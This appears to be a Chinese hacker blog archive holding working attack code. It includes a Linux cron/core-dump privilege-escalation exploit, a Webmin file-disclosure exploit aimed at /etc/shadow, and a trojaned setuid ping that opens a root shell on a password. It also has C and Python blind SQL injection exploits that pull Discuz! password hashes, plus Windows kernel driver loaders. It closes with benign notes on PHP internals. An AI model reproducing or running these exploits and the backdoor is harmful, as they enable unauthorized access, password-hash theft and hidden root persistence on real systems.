    printf("By: dreyer & RoMaNSoFt\n");
    printf("Last modified By: wofeiwo (chage shellcode)\n");
    printf("Last edited: [ 13.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(63);

    printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
    system("/tmp/fakesh");
    return 0;
}

python写的,去年webmin 一个高危漏洞的exp

#!/usr/bin/python
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006

import sys, urllib, os

def usage (name):
    print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo \n\nUsage: %s  \nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)

def main ():
    if len(sys.argv) != 3:
        (filepath, filename) = os.path.split(sys.argv[0])
        usage(filename)
        sys.exit(-1)
    else:
        target = sys.argv[1] + "unauthenticated" + "/..%01"*61 + "/" + sys.argv[2]
        sock = urllib.urlopen(target)
        getfile = sock.read()
        sock.close()
        print getfile

if __name__ == "__main__": main()

n年前写的替换系统ping的后门,因为ping是有s位的:)

#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PWD "wofeiwo"

/* init the daemon, if success return 0 other <0 */
int daemon_init()
{
    struct sigaction act;
    int i, maxfd;

    if(fork() != 0) exit(0);
    if(setsid() < 0) return(-1);

    act.sa_handler = SIG_IGN;
    /*act.sa_mask = 0;*/
    act.sa_flags = 0;

    sigaction(SIGHUP, &act, 0);

    if(fork() != 0) exit(0);

    chdir("/");
    umask(0);
    maxfd = sysconf(_SC_OPEN_MAX);
    for(i=0; i<maxfd; i++)
    close(i);
    open("/dev/null", O_RDWR);
    dup(0);
    dup(1);
    dup(2);
    return(0);
}

int main(int argc, char *argv[])
{
    int i,j=0;
    char argv_execv[52][128];
    char usage[]=
    "Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
        "            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
        "            [-M mtu discovery hint] [-S sndbuf]\n"
        "            [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

    if (argc == 1) printf("%s", usage);
    if (argc > 1)
    {
        if (strcmp(PWD, argv[1]) == 0)
        {
            signal(SIGCHLD, sig_chid);
            daemon_init();
            seteuid(0);
            setuid(0);
            setgid(0);
            system("/bin/bash");
            return 1;
        }
        else
        {
            for (i = argc; i > 0; i--)
            {
                strcpy(argv_execv[j],argv[j]);
                j++;
            }
            strcpy(argv_execv[j], "\0");
            execv("/bin/ping", argv);
            return 1;
        }
    }
    return 0;
}

最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的

/*
*
* Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006
*
*/

#include
#include
#include
#include

#pragma comment (lib,"ws2_32")

#define PASSLEN 32

char *HMod[] =            { "GET","POST"};
char *HttpVer[] =        { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] =        { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"};
char *HAcceptLg[] =        { "Accept-Language:"," zh-cn"};
char *HContentTp[]=        { "Content-Type:"," application/x-www-form-urlencoded"};
char *HAcceptEn[] =        { "Accept-Encoding:"," gzip, deflate"};
char *HUserAgent[]=        { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char *HReferer[]=        { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char *HHost[]=            { "Host: "};
char *HContentLg[]=      { "Content-Length:"," 189"};
char *HContion[]=        { "Connection:"," Keep-Alive"};
char *HCacheCtr[]=        { "Cache-Control:"," no-cache"};
char *HXForwardedFor[]=    { "X-Forwarded-For:"};
char *HCookie[]=        { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char *HPost[]=            { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];

char temp1[1024],temp2[10240] = {0};


int sanddata(char *host, int port, char *path, char *uid, int ascii, int chrnum)
{
    WSADATA  WSAData={0};
    struct hostent *he;
    struct sockaddr_in  ServerAddr={0};
    SOCKET Socket=0;
    int ren = 0;
    char *p = NULL;

    if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

    if((he = gethostbyname(host)) == 0)
    {
        fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
        exit(-1);
    }

    Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);


    ServerAddr.sin_family = AF_INET;
    ServerAddr.sin_addr = *((struct in_addr *)he->h_addr);
    ServerAddr.sin_port = htons(port);

    memset(temp1,0,1024);
    sprintf(querystring, query, uid, chrnum, ascii);
    sprintf(temp1,    "%s %s%s %s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "\r\n"
                    "%s\r\n"
                    "\r\n\r\n"
                    ,
                    HMod[1],path,"logging.php?action=login",HttpVer[1],
                    HAccept[0],HAccept[1],
                    HAcceptLg[0],HAcceptLg[1],
                    HContentTp[0],HContentTp[1],
                    HAcceptEn[0],HAcceptEn[1],
                    HUserAgent[0],HUserAgent[1],
                    HReferer[0],HReferer[1],
                    HHost[0],host,
                    HContentLg[0]," 0",
                    HContion[0],HContion[1],
                    HCacheCtr[0],HCacheCtr[1],
                    HXForwardedFor[0],querystring,
                    HCookie[0],HCookie[1],
                    HPost[0]
                    );
    if (chrnum == 1) printf("\r\n%s\r\n",temp1);

    connect(Socket,(SOCKADDR *)&ServerAddr,sizeof(ServerAddr));

    send(Socket,temp1,strlen(temp1),0);
    //sleep(1);
    while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

    if (chrnum == 1) printf("\r\n%s\r\n",temp2);
    if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
    {
        fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
        exit(1);
    }
    if((p = strstr(temp2, "ip3")) == NULL)
    {
        close(Socket);
        return ascii;
    }

    close(Socket);
    return 0;
}

int main(int argc,char *argv[])
{
    int i = 0,j = 0,ret = 0;

    fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
    fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

    if(argc != 5)
    {
        fprintf(stderr, "Usage: %s    \r\n", argv[0]);
        fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
        exit(1);
    }

    fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
    fprintf(stdout, "[+] Trying ..\r\n");
    fprintf(stdout, "[+] Plz wait a monment ..\r\n");
    fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

    for(j = 1; j <= PASSLEN; j++)
    {
        for(i = 48; i < 58; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        for(i = 98; i < 123; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        finded: ret = 0;
    }

    fprintf(stdout, "\r\n");
    fprintf(stdout, "[+] Finished\r\n");

    return 0;
}

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
    def __init__ (self, threadname, url, u):
        self.realurl = url
        self.realu = u
        threading.Thread.__init__(self, name = threadname)

    def run (self):
        lenth = 32
        injection(lenth, self.realurl, self.realu, self.getName())

def  injection (lenthofpass, realurl, path, num):

        ran = range(97, 123)
        for a in range(48, 58): ran.append(a)

        for i in ran:

            query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            #print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request("POST", path + "logging.php?action=login&",data , header)
            sleep(1)
            response = http.getresponse()
            re1 = response.read()
            if re1.find('SELECT') == -1:
                print '[-] Unvalnerable host'
                print '[-] Exit..'
                sys.exit(1);

            elif re1.find('ip3') == -1:
                password[int(num)] = chr(i)
                #print '[+] password ' + num + ': ' + chr(i)
                http.close()
                sleep(1)
                break
            #print re1
            #print '-----------------------------------------------'
            http.close()
            sleep(1)

def main ():
    print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
    print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    if len(sys.argv) == 3:
        url = urlparse(sys.argv[1])
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2]
    else:
        print "Usage: %s  " % sys.argv[0]
        print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)

    print '[+] Connect %s' % url[1]
    print '[+] Begin threads'
    print '[+] Plz wait a long long time'

    for a in range(1,33) :
        thread = creatthread(str(a), url, u)
        thread.start()

    while threading.activeCount() != 1:
        continue
    else:
        sys.stdout.write( '[+] The uid=' + sys.argv[2] + ' password hash is: ' )
        for n in range(1, 33) :
            sys.stdout.write(password[n])
        sys.stdout.write('\n[+] Finished \n')


if __name__ == '__main__': main()

wofeiwo 2007-05-22 16:12 发表评论

使用ZwSetSystemInformation加载驱动

wofeiwo — Tue, 08 May 2007 12:54:00 GMT

#include
#include
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define SystemLoadAndCallImage 38

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;

int main(int argc, char *argv[])
{
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    UNICODE_STRING TmpBuff;
    char    szDrvFullPath[256],szTmp[256];
    int iBuffLen;

    printf("Load driver with ZwSetSystemInformation( )\r\n");
    printf("Date: 8th May 2007\r\n");
    printf("Modifed by: GaRY \r\n\r\n");
    if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
    {
        printf("Usage: %s \r\n", argv[0]);
        exit(-1);
    }

    // 从ntll.dll获取函数
    if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"),  "RtlInitUnicodeString" )) )
    {
        printf( "GetProcAddress(\"RtlInitUnicodeString\") Error:%d\n", GetLastError() );
        exit(1);
    }
    if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
    {
        printf( "GetProcAddress(\"ZwSetSystemInformation\") Error:%d\n", GetLastError() );
        exit(1);
    }
    if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
    {
        printf( "GetProcAddress(\"ZwSetSystemInformation\") Error:%d\n", GetLastError() );
        exit(1);
    }

    GetFullPathName(argv[1], 256, szTmp, NULL);
    printf("Loading driver: %s\r\n", szTmp);
    iBuffLen = sprintf(szDrvFullPath, "\\??\\%s", szTmp);
    szDrvFullPath[iBuffLen]=0;
    TmpBuff.Buffer = (PVOID)szDrvFullPath;
    TmpBuff.Length = iBuffLen;
    RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);

    if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))     //加载进内核空间
    {
        printf("Driver: %s loaded.\r\n", szDrvFullPath);
    }
    else
    {
        printf("Driver: %s not loaded.\r\n", szDrvFullPath);
    }
    return true;
}

wofeiwo 2007-05-08 20:54 发表评论

使用ZwLoadDriver加载驱动

wofeiwo — Tue, 08 May 2007 07:12:00 GMT

#include
#include

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PVOID Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;

typedef LSA_UNICODE_STRING UNICODE_STRING, *PUNICODE_STRING;

// 申明ntdll中使用的函数
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;
typedef DWORD (CALLBACK* RTLFREEUNICODESTRING)(PVOID);
RTLFREEUNICODESTRING RtlFreeUnicodeString;
typedef DWORD (CALLBACK* ZWLOADDRIVER)(PVOID);
ZWLOADDRIVER ZwLoadDriver;

int LoadDriver(char * szDrvName, char * szDrvPath)
{
    //修改注册表启动驱动程序
    char szSubKey[200], szDrvFullPath[256];
    LSA_UNICODE_STRING buf1;
    LSA_UNICODE_STRING buf2;
    int iBuffLen;
    HKEY hkResult;
    char Data[4];
    DWORD dwOK;
    iBuffLen = sprintf(szSubKey,"System\\CurrentControlSet\\Services\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    dwOK = RegCreateKey(HKEY_LOCAL_MACHINE,szSubKey,&hkResult);
    if(dwOK!=ERROR_SUCCESS)
        return false;
    Data[0]=1;
    Data[1]=0;
    Data[2]=0;
    Data[3]=0;
    dwOK=RegSetValueEx(hkResult,"Type",0,4,(const unsigned char *)Data,4);
    dwOK=RegSetValueEx(hkResult,"ErrorControl",0,4,(const unsigned char *)Data,4);
    dwOK=RegSetValueEx(hkResult,"Start",0,4,(const unsigned char *)Data,4);
    GetFullPathName(szDrvPath, 256, szDrvFullPath, NULL);
    printf("Loading driver: %s\r\n", szDrvFullPath);
    iBuffLen = sprintf(szSubKey,"\\??\\%s",szDrvFullPath);
    szSubKey[iBuffLen]=0;
    dwOK=RegSetValueEx(hkResult,"ImagePath",0,1,(const unsigned char *)szSubKey,iBuffLen);
    RegCloseKey(hkResult);
    iBuffLen = sprintf(szSubKey,"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    buf2.Buffer = (PVOID)szSubKey;
    buf2.Length = iBuffLen;
    RtlAnsiStringToUnicodeString(&buf1,&buf2,1);
    //加载驱动程序
    dwOK = ZwLoadDriver(&buf1);
    RtlFreeUnicodeString(&buf1);
    iBuffLen=sprintf(szSubKey,"%s%s\\Enum","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    //删除注册表项
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"%s%s\\Security","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"%s%s","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"\\\\.\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    return true;
}

int main(int argc, char *argv[])
{
    printf("Load driver with ZwLoadDriver( )\r\n");
    printf("Date: 8th May 2007\r\n");
    printf("Modifed by: GaRY \r\n\r\n");
    if(argc != 3)
    {
        printf("Usage: %s  \r\n", argv[0]);
        exit(-1);
    }
    HMODULE hNtdll = NULL;
    hNtdll = LoadLibrary( "ntdll.dll" );

    //从ntdll.dll里获取函数
    if ( !hNtdll )
    {
        printf( "LoadLibrary( NTDLL.DLL ) Error:%d\n", GetLastError() );
        return false;
    }

    RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING)
        GetProcAddress( hNtdll, "RtlAnsiStringToUnicodeString");
    RtlFreeUnicodeString = (RTLFREEUNICODESTRING)
        GetProcAddress( hNtdll, "RtlFreeUnicodeString");
    ZwLoadDriver = (ZWLOADDRIVER)
        GetProcAddress( hNtdll, "ZwLoadDriver");

    //注册驱动程序
    if(LoadDriver(argv[1], argv[2]) == false) return false;
    return true;
}

wofeiwo 2007-05-08 15:12 发表评论

PHP5 的 magic_quotes_gpc

wofeiwo — Tue, 15 Aug 2006 08:05:00 GMT

PHP5的$_SERVER数组对magic_quotes_gpc不受影响,tip之

wofeiwo 2006-08-15 16:05 发表评论

PHP源代码简单分析 [zt]

wofeiwo — Tue, 15 Aug 2006 07:55:00 GMT

原贴地址: http://x-space.discuz.net/space/html/95/22195_itemid_14752.html

当前版本PHP5.1.4

1. 目录结构
   1. build 和编译有关的目录。
   2. ext 扩展库代码，例如 Mysql、zlib、iconv 等我们熟悉的扩展库。
   3. main 主目录。
   4. sapi 和各种服务器的接口调用，例如apache、IIS等，也包含一般的fastcgi、cgi等。
   5. win32 和 Windows 下编译 PHP 有关的脚本。用了 WSH。
   6. Zend 文件夹核心的引擎。

2. PHP使用Lex和Yacc对语法进行解析。
在 Zend 目录下有两个文件 zend_language_parser.y 与 zend_language_scanner.l 他们是Lex和Yacc的脚本文件，通过这两个脚本文件生成对应的.c和.h文件，实际上这在 linux 下非常普遍，gcc 也使用它们产生语树。

3. PHP如何使用Mysql？
ext 目录下有一个 mysql 子目录，这个目录中的php_mysql.c 和 php_mysql.h 负责 PHP 与 Mysql 操作。使用了 Mysql 手册中的 C 语言 API。

4. 安全模式？
   main 文件夹下的safe_mode.h 和 safe_mode.c 文件负责PHP的安全模式。
5. 那些是 PHP 的标准函数，那些是扩展函数？
   ext 目录下英文意思是扩展，而在 ext 下还是有一个 standard 文件夹，存放着 PHP 中的标准函数，例如 explode 这个函数是在 ./ext/standard/string.c 下定义的。
6. PHP 源代码中的PHP_FUNCTION(xx) 宏。
   这个宏用来检验一个函数名称是否合法。合法的函数名称应该由小写字母及下划线组成。
7. 那些函数集是标准的？
   通过 ./ext/standard/ 目录我们可以看到以下常用函数集是标准的。字符串函数集、数组函数集、文件及目录操作函数集、md5算法等。
8. 一些函数的实现过程
   1. fsockopen, pfsockopen 的实现
      这两个函数的实现离不开 ./ext/standard/fsock.c 文件中的 php_fsockopen_stream 函数。具体的socket都在./main/network.c 中实现。
9. PHP 函数集注册过程
   在./main/internal_functions.c 中有一个数组 php_builtin_extensions 默认下有以下成员：

   1. phpext_bcmath_ptr
   2. phpext_calendar_ptr
   3. phpext_com_dotnet_ptr
   4. phpext_ctype_ptr
   5. phpext_date_ptr
   6. phpext_ftp_ptr
   7. phpext_hash_ptr
   8. phpext_odbc_ptr
   9. phpext_pcre_ptr
   10. phpext_reflection_ptr
   11. phpext_session_ptr
   12. phpext_spl_ptr
   13. phpext_standard_ptr
   14. phpext_tokenizer_ptr
   15. phpext_zlib_ptr

   接着 php_register_extensions(php_builtin_extensions, EXTCOUNT TSRMLS_CC) 进行注册

10. 有趣的Zend LOGO图片
       ./main/logos.h 文件中，用 zend_logo 与 php_logo 数组保存了 PHP 标志和 Zend 标志。所以你根本在发行包里找不到zend.gif。
11. PHP的语法树？

    1. Lex与Yacc
       市面上有这本书。大家可以买来看看，包括GCC都是用它们兄弟生成的语法树。如果对编译器感兴趣。可以翻阅市面上关于这方面的书，并不多就几本。

    2. .l与.y语法树文件
       ./Zend/zend_language_scanner.l与./Zend/zend_language_parser.y 规定了PHP的语法。从字面意义上scanner表示语法初步扫描，parser表示语法解析。根据这两个文件lex与yacc可以生成对应的c代码。所以相对来说生成语法是很方便的。

    3. 如何定义一个符号
       例如 if($language='php') 这一句中的if 就是一个token 语法中我们用T_IF表示。具体在.l文件中如下定义了：

       < ST_IN_SCRIPTING > " if " {
               return T_IF;
      }

这样.php文件中的if就会被翻译成内置符号T_IF。’(单引号)被如下定义：

       < ST_SINGLE_QUOTE > [ ' ] {
            BEGIN(ST_IN_SCRIPTING);
            return ' \ '' ;
      }

4. 复合符号例如最常见的变量命名$discuz_user, $submit 等。

       < ST_IN_SCRIPTING , ST_DOUBLE_QUOTES , ST_HEREDOC , ST_BACKQUOTE > " $ " {LABEL} {
            zend_copy_value(zendlval , (yytext + 1 ) , (yyleng - 1 ));
            zendlval -> type = IS_STRING ;
             return T_VARIABLE;
      }

   5. 一个有效的if语句过程
      这个定义在zend_language_parser.y 189行:

      T_IF ' ( ' expr ' ) ' {
            zend_do_if_cond( & $ 3 , & $ 4 TSRMLS_CC);
      } statement {
            zend_do_if_after_statement( & $ 4 , 1 TSRMLS_CC);
      } elseif_list else_single {
            zend_do_if_end(TSRMLS_C);
      }
       | T_IF ' ( ' expr ' ) ' ' : ' {
            zend_do_if_cond( & $ 3 , & $ 4 TSRMLS_CC);
      } inner_statement_list {
            zend_do_if_after_statement( & $ 4 , 1 TSRMLS_CC);
      } new_elseif_list new_else_single T_ENDIF ' ; ' {
            zend_do_if_end(TSRMLS_C);
      }

if 后面必须存在()，圆括弧里面是表达式 expr 表达式在734行被定义：

      expr:
            r_variable { $$ = $ 1 ; }
             | expr_without_variable { $$ = $ 1 ; }
      ;

if 后面可以跟 elseif 语句及 else 语句。
从语法树里面我们看出 if () 后面是可以跟 : 的，这一般很少被使用吧。

6. 优先级和左右结合性
一般情况下.y文件中最先定义的操作符优先级相对低，并且可以使用%left、%right 进行描述左右结合性，例如：

       % left ' + ' ' - ' ' . '
       % left ' * ' ' / ' ' % '
       % right ' ! '

      这说明'!'在 PHP 语法中是右结合的， '*' '/' '%' '+' '-' '.' 是左结合的，并且'!'的优先级更高
      例如语法 !$a + $b 要先计算 !$a 在进行加法操作
      %left ',' 被放在最上面定义，说明他的优先级最低，因为我们知道','可以等同一个语句。

7. php.ini的解析

1. 如果规定数值正负？

         < INITIAL > [ ] * ( " true " | " on " | " yes " )[ ] *   {
              ini_lval -> value . str . val   =   zend_strndup( " 1 " ,     1 );
              ini_lval -> value . str . len   =     1 ;
              ini_lval -> type   =     IS_STRING ;
                return   CFG_TRUE;
      }

        < INITIAL > [ ] * ( " false " | " off " | " no " | " none " )[ ] *   {
              ini_lval -> value . str . val   =   zend_strndup( "" ,     0 );
              ini_lval -> value . str . len   =     0 ;
              ini_lval -> type   =     IS_STRING ;
                return   CFG_FALSE;
      }

wofeiwo 2006-08-15 15:55 发表评论